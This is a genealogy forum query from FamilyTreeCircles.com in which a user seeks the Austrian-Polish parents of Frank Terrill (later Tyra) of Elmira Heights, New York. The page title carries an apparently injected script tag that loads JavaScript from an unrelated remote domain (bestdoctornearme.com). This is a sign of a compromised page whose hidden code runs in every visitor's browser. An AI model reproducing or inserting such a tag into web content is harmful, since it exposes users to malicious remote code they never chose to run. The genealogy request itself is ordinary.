Looking for Parents of Frank TERRILL, TYRA from Austia/Poland<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script> :: FamilyTreeCircles.com Genealogy
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Looking for Parents of Frank TERRILL, TYRA from Austia/Poland

Query by etroidl

Hi there!
I am searching for my Moms grandfather - Frank TERRILL b. 1869/70, Austria Poland and immigrated to the US in 1890 and his wife Theodora SMALLEY b. 1868/69, Austria Poland, (can find immigration information for her).

They lived in Elmira Heights, Chemung County, New York USA. One of Frank's sons and my Mom's father was baptized Bascilius Terrill, but changed his name to Bascilius (AKA: Joe/Joseph) Tyra in the 40's. According to my mother, he wanted his true family name back but never gave her any other information. Apparently he was not very talkative about them and Mom never met any of them.

I would like to locate Frank Terrill's parents in Austria Poland and am stuck, unsure of where to proceed from this point.

Any thoughts, comments, suggestions are most welcome. Thanks for your time. Elaine

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by etroidl Profile | Research | Contact | Subscribe | Block this user
on 2013-10-20 10:24:54

etroidl has been a Family Tree Circles member since Oct 2013.

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